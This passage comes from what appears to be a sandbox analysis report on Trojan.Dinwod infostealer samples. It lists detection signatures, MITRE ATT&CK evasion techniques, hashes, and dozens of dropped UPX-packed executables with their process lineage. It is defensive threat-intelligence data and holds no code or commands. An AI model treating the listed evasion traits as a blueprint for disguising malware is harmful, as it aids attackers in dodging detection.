\"%WINDIR%\\debug\\xmlDown.dll\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "static-97", "relevance": 10, "name": "PE file contains executable resources", "description": "070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1 has PE file in resource with name: \"RT_DIALOG\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n 070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1 has PE file in resource with name: \"RT_ICON\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n 070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1 has PE file in resource with name: \"RT_STRING\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n 070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1 has PE file in resource with name: \"RT_GROUP_ICON\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n 070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1 has PE file in resource with name: \"RT_ACCELERATOR\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n 070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1 has PE file in resource with name: \"RT_MENU\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmloder.exe has PE file in resource with name: \"RT_DIALOG\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmloder.exe has PE file in resource with name: \"RT_ICON\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmloder.exe has PE file in resource with name: \"RT_STRING\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmloder.exe has PE file in resource with name: \"RT_GROUP_ICON\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmloder.exe has PE file in resource with name: \"RT_ACCELERATOR\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmloder.exe has PE file in resource with name: \"RT_MENU\" and filetype:PE32 executable (GUI) Intel 80386\n for MS Windows\n xmlDown.dll has PE file in resource with name: \"RT_ACCELERATOR\" and filetype:PE32 executable (DLL) (GUI) Intel 80386\n for MS Windows\n xmlDown.dll has PE file in resource with name: \"RT_ICON\" and filetype:PE32 executable (DLL) (GUI) Intel 80386\n for MS Windows", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9
https://hybrid-analysis.com/sample/7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9
Hybrid Analysis - Infostealers
{"size": 341818, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9", "sha256": "7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 109, "extracted_files": [{"name": "00802.exe", "file_path": "C:\\00802.exe", "file_size": 341870, "sha256": "b51ed39019b07e834acabafdad23c2d3195887d00a8633c1c91b640130298a84", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00802.exe (PID: 5868)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "024668.exe", "file_path": "C:\\024668.exe", "file_size": 342545, "sha256": "9dfdf95675484db1f8ba05ba339781baf2d8a976fd6c8e3a0fbb9d6dddfa34f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "86620.exe (PID: 3328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "026424.exe", "file_path": "C:\\026424.exe", "file_size": 342321, "sha256": "7034d1fd63a07c2ea8d10f290e777e2341649045b77f7b140db768775874c344", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64402.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "062028.exe", "file_path": "C:\\062028.exe", "file_size": 342575, "sha256": "2ec823f884b0541279dc1378c7bc6c179afbbb1d94b4f9faf64578358d984a96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "062028.exe (PID: 624)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06462.exe", "file_path": "C:\\06462.exe", "file_size": 342025, "sha256": "67ae992af1495423a0e30973fcbea4ff6133e697e8619960fa898e538f885168", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "06462.exe (PID: 2968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08240.exe", "file_path": "C:\\08240.exe", "file_size": 342496, "sha256": "23b49b67dacc94db088b00c6ca3deffbf3a80a735ab7b330524c2b70a3a62d83", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08240.exe (PID: 1408)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08406.exe", "file_path": "C:\\08406.exe", "file_size": 342559, "sha256": "a7e1313f98cdcd4b34b751db53fe4e0d92e16f78dbe8d043d5a9b1be7801132d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08406.exe (PID: 1828)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0882288.exe", "file_path": "C:\\0882288.exe", "file_size": 342060, "sha256": "e9f1b6d21441ca50ce9259929a751f301737213fcf7263c4aecdbd2a31b89848", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2688428.exe (PID: 3800)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "208464.exe", "file_path": "C:\\208464.exe", "file_size": 341956, "sha256": "a40aac3180dfb92de42ad3edf4c29ea01c58fef1ef854eb097c92d0da0ef6306", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "208464.exe (PID: 6080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "226448.exe", "file_path": "C:\\226448.exe", "file_size": 342459, "sha256": "85fdd27610fc41fb0f139cfb1036d7cb15869f86fdf034ea398d3e6d8e3c0aee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64288.exe (PID: 3280)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "26400.exe", "file_path": "C:\\26400.exe", "file_size": 342621, "sha256": "c377df179389a09195fa55e46fb58e9be6c5dbcfa394e245fa33f319a2a45b99", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "286488.exe (PID: 1404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2688428.exe", "file_path": "C:\\2688428.exe", "file_size": 342043, "sha256": "93194ca01125e0f1b255556bf1e29e14c9fb0c5bd2516ee37f6761582b770475", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2688428.exe (PID: 3800)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "286488.exe", "file_path": "C:\\286488.exe", "file_size": 342608, "sha256": "ba92e28314bdf5c3b6380d9e63da20b5c519682a1dedcdbe5a9749d31b1aee35", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "286488.exe (PID: 1404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42042.exe", "file_path": "C:\\42042.exe", "file_size": 342200, "sha256": "5268878e785c7ad2ef3e71b6dff42c82b38f3c74b748950a21e068f68a5fc5a3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6886668.exe (PID: 2868)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4222660.exe", "file_path": "C:\\4222660.exe", "file_size": 342414, "sha256": "6045d587c5869e835238c7a60a049c4bfaca224d586ffd8120bac90c7e6a8c09", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4222660.exe (PID: 3072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42242.exe", "file_path": "C:\\42242.exe", "file_size": 341994, "sha256": "e0690ace61b7e3bb260628826c8972bee5a37e9c3c0269bd47635ba393e20dd2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42242.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42402.exe", "file_path": "C:\\42402.exe", "file_size": 342434, "sha256": "4f85e351597f7a5dbcd794f7daaf7f40db229ce272c8b6bfc67bca2ff39c522a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42402.exe (PID: 1688)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "442444.exe", "file_path": "C:\\442444.exe", "file_size": 342653, "sha256": "6e62dc6bcc78c5abf33e3a94bda7ec67edb8e5c12c232338df89a54c4aa7c2f3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "644444.exe (PID: 820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44664.exe", "file_path": "C:\\44664.exe", "file_size": 342517, "sha256": "52e20b916e5d45e7066773fa5ed484a4749f0105cbd6a9f11a7de5544f053fb7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44664.exe (PID: 344)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "464204.exe", "file_path": "C:\\464204.exe", "file_size": 342672, "sha256": "948dfb848b3aa128a73b54d6784e7d2c64827ea3a5d9ef91c3722e78ead6fd1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464204.exe (PID: 1668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482480.exe", "file_path": "C:\\482480.exe", "file_size": 342590, "sha256": "22b2239fe5ef9857029e714955ba4210707cb1f154bd76e115d425d2a4d7b25e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "062028.exe (PID: 624)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60644.exe", "file_path": "C:\\60644.exe", "file_size": 342477, "sha256": "c85c30e0a96d539bad9119afc59a5191512bcf46d9ab7e6596b5f84e3f56050e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "226448.exe (PID: 3240)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "620006.exe", "file_path": "C:\\620006.exe", "file_size": 341829, "sha256": "caef5d3f79ea8ab56b85fd627f5f82b5f06afb1d2476ee8083368245e509679a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62440.exe", "file_path": "C:\\62440.exe", "file_size": 342294, "sha256": "0def72e343411e7b96048acd1b356ff3704c449d1482c829a4e34084a6c6e767", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "62440.exe (PID: 3628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64268.exe", "file_path": "C:\\64268.exe", "file_size": 342281, "sha256": "0ea6416b28a6c9faa34bf821177e5011110f5b18b79aaef316ad4392f76b0465", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64268.exe (PID: 4048)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "642824.exe", "file_path": "C:\\642824.exe", "file_size": 342071, "sha256": "56e6ac5eb42a31455db3656ef617c5643ef5cbff09678215e226c7771b4df10f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "642824.exe (PID: 4012)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64288.exe", "file_path": "C:\\64288.exe", "file_size": 342444, "sha256": "1d640ae958238fd7b980d0bc0ef783ee60b3417c90f508b3ba2eca06e9c34c7b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42402.exe (PID: 1688)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64402.exe", "file_path": "C:\\64402.exe", "file_size": 342311, "sha256": "5bf505e2f2455a6a1aac23cbbb408e4ef4cea42442d513a06accd725f0211fa2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64402.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "644444.exe", "file_path": "C:\\644444.exe", "file_size": 342637, "sha256": "05cd284a2f594ba75a6210589c43633010e48bdeb76c3e983d0a2904c03249c1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "644444.exe (PID: 820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "648086.exe", "file_path": "C:\\648086.exe", "file_size": 342747, "sha256": "41b4175b9be51a9a34f0403d9623cbc6cb0764c44ec2a610f0c27a91a8f34d98", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "648086.exe (PID: 2308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "660202.exe", "file_path": "C:\\660202.exe", "file_size": 341890, "sha256": "6e3e0d76011e61bf9701c83026960a8858db71696f9bf5c07a15877b0164939e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "660202.exe (PID: 5888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6886668.exe", "file_path": "C:\\6886668.exe", "file_size": 342184, "sha256": "5268e836161dfab2ea44646a1b0d362baa8e51750326ea1cfb6ebe7c5bb96516", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "drjtt.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "688844.exe", "file_path": "C:\\688844.exe", "file_size": 342692, "sha256": "a9148189bd970170359cd37186af55cd5d698a0a6d949718c51c8c860524a19e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "688844.exe (PID: 3816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82064.exe", "file_path": "C:\\82064.exe", "file_size": 341970, "sha256": "b13f3f6294932e197d7e43264558caaf6ad3ac63089de2e2db7f04c970b30553", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "208464.exe (PID: 6080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "82440.exe", "file_path": "C:\\82440.exe", "file_size": 342757, "sha256": "b3caac9733a441a6211a216b8aa2d95d6b95078132dd1a4ce9eda8abca7f4201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "82440.exe (PID: 3536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "848482.exe", "file_path": "C:\\848482.exe", "file_size": 342009, "sha256": "ba3419b0506bc3e63234c54c80ea298cd0cd56416ad18b4e88d5c37f1e28fd38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42242.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "860482.exe", "file_path": "C:\\860482.exe", "file_size": 342507, "sha256": "d72400a8d2a45e2eaa9369bbde1c0ec26629773dfdbaed8562cf2bb473a44e2f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08240.exe (PID: 1408)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "86620.exe", "file_path": "C:\\86620.exe", "file_size": 342527, "sha256": "181e91389829ca6ba68d8de9235db2c38477563cd2a07cfb4ef9e6c472efb776", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "86620.exe (PID: 3328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "880446.exe", "file_path": "C:\\880446.exe", "file_size": 342339, "sha256": "4990758dd9c34a9285a8385775b499d6655b33bb021cbbd1ad8b93224f811301", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "026424.exe (PID: 2604)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "884648.exe", "file_path": "C:\\884648.exe", "file_size": 342773, "sha256": "444c2d67154c44fb8df3e63dbf625211358a397c1591c95f1eec314b8e544efd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "82440.exe (PID: 3536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "886408.exe", "file_path": "C:\\886408.exe", "file_size": 341982, "sha256": "5908a8aeb3bc233461c220a3071b71f94e4d73c2facbf9b9f2a6399e477c0730", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "82064.exe (PID: 4116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blvpbn.exe", "file_path": "C:\\blvpbn.exe", "file_size": 342234, "sha256": "85daf5edcdec3c45b1e1e1dd3b0d0969c1a86d5d8c218f0061b92f488c8e5779", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "blvpbn.exe (PID: 2880)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnbhnh.exe", "file_path": "C:\\bnbhnh.exe", "file_size": 342732, "sha256": "63cc7f3b167b93ff81794e9833427bbe8253690988c97c502a8bc6c6c694cc0d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjlbldf.exe (PID: 2676)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dndhhn.exe", "file_path": "C:\\dndhhn.exe", "file_size": 342707, "sha256": "de7e7e9cb9ba22d29cd0693c0e632c5760fd063f903c76079ebf16dd3e4b1ac2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "688844.exe (PID: 3816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drjtt.exe", "file_path": "C:\\drjtt.exe", "file_size": 342170, "sha256": "3a2599a2eb846609f8a59183e3e7fbaa5ec99844380c962963975294c66e7549", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "drjtt.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drlrf.exe", "file_path": "C:\\drlrf.exe", "file_size": 342132, "sha256": "942f73ef4fdfaccb474be71caf8de8dfce7fec8e96a5dcfd740690a822f0dbc5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "drlrf.exe (PID: 1168)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fjtbx.exe", "file_path": "C:\\fjtbx.exe", "file_size": 342402, "sha256": "5e5618a93c8bb511a3b45d3240566db57709e6a67c17b7b4d6f31743dc1b3e2e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fjtbx.exe (PID: 2332)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnnxblt.exe", "file_path": "C:\\fnnxblt.exe", "file_size": 342265, "sha256": "3e7af1256baa1c1e7831ea4a94f2ee8e3b2eb20f503a33c98be1ce739ef78942", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "txjxfrd.exe (PID: 2952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hhbbtl.exe", "file_path": "C:\\hhbbtl.exe", "file_size": 342789, "sha256": "4e37d67bfa799c581cae523e3ba9a95fbad583da507f5e29de89dd7de461779e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "884648.exe (PID: 2204)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hlrdfx.exe", "file_path": "C:\\hlrdfx.exe", "file_size": 342372, "sha256": "66b0b13d18c069bf53a81497dd0e257294799776a4a146f9628ddf5a66bb2c08", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hlrdfx.exe (PID: 6088)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvhxj.exe", "file_path": "C:\\lvhxj.exe", "file_size": 341845, "sha256": "2df0082c0a3c7a184c460e7d668de3d73eba9c4f21a0e50c271e3c79a914e3cf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "620006.exe (PID: 5816)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvvjfph.exe", "file_path": "C:\\lvvjfph.exe", "file_size": 342121, "sha256": "747d1ebdc5ac76e08cd814c1752711c0c93754ee7116fcc8ac7ec79d1c02c937", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdtrht.exe (PID: 3576)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ndhlfdh.exe", "file_path": "C:\\ndhlfdh.exe", "file_size": 342389, "sha256": "a281877d766255d2835c2fb86c56acf0eec9f0ecca8b185f99ff009986ac554d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hlrdfx.exe (PID: 6088)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdrvn.exe", "file_path": "C:\\pdrvn.exe", "file_size": 341928, "sha256": "fd38f0702cd0459be84d182d33221522f409a1b4955d70111327139302a4d250", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trrtd.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdtrht.exe", "file_path": "C:\\pdtrht.exe", "file_size": 342103, "sha256": "5573adae8f2686b9abaad5fca93832ce6b8ae7dad0d74f90b15b6f0ce9d9cd15", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjjxrvl.exe (PID: 4264)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pthnb.exe", "file_path": "C:\\pthnb.exe", "file_size": 341856, "sha256": "21cc99b2a2fcd1fe6c168528f194387850e25d9e07c0d4b24acbfa9b6bc6c7b3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pthnb.exe (PID: 5896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjjxrvl.exe", "file_path": "C:\\rjjxrvl.exe", "file_size": 342091, "sha256": "1ef120db18b59ad8125b80a559b1c29271e1d6fae660927fb69ceab69dcbad60", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjjxrvl.exe (PID: 4264)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjlbldf.exe", "file_path": "C:\\rjlbldf.exe", "file_size": 342722, "sha256": "3d8b73692e22160204ad5dd6a3f300e52f53131a3737aae2c9b9c404a57340a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rjlbldf.exe (PID: 2676)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thpxfjv.exe", "file_path": "C:\\thpxfjv.exe", "file_size": 342216, "sha256": "ce68afb5d44f2444f17860bdde5a6d750f10956c33846f233df9f569db01c08e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42042.exe (PID: 2472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trrtd.exe", "file_path": "C:\\trrtd.exe", "file_size": 341909, "sha256": "61f8158fbd846ce97147e77fff54daa01982689593bcfd4f10fb13cde57bf7d7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trrtd.exe (PID: 6132)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "txjxfrd.exe", "file_path": "C:\\txjxfrd.exe", "file_size": 342250, "sha256": "9ef23d376a86db98580dc13299644d3ba76a8e8806dfed69d3b99dd0bec244e6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "txjxfrd.exe (PID: 2952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xddtpjj.exe", "file_path": "C:\\xddtpjj.exe", "file_size": 342355, "sha256": "65170dfd9032021cec67ae478ce0de034f0e607445a10010a6d695ccd4a7aaca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xddtpjj.exe (PID: 3716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xdhfnxr.exe", "file_path": "C:\\xdhfnxr.exe", "file_size": 342152, "sha256": "9b4bb0ebd685457a1ae8fa533272b14e1a54704bcf374b4d08cc7af4b1cb1e60", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xdhfnxr.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xjdpttx.exe", "file_path": "C:\\xjdpttx.exe", "file_size": 341942, "sha256": "e222c7d3f1e2034e464650821233ac0551d0c0ad38fd3a7d3745d5d1833419d5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdrvn.exe (PID: 5976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ffffffr.exe", "file_size": 342920, "sha256": "12f8d0012ab7091a5e1009d7a64429fb080f2ad4e67779f3ce65c479b3d6438a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvhrb.exe", "file_size": 342906, 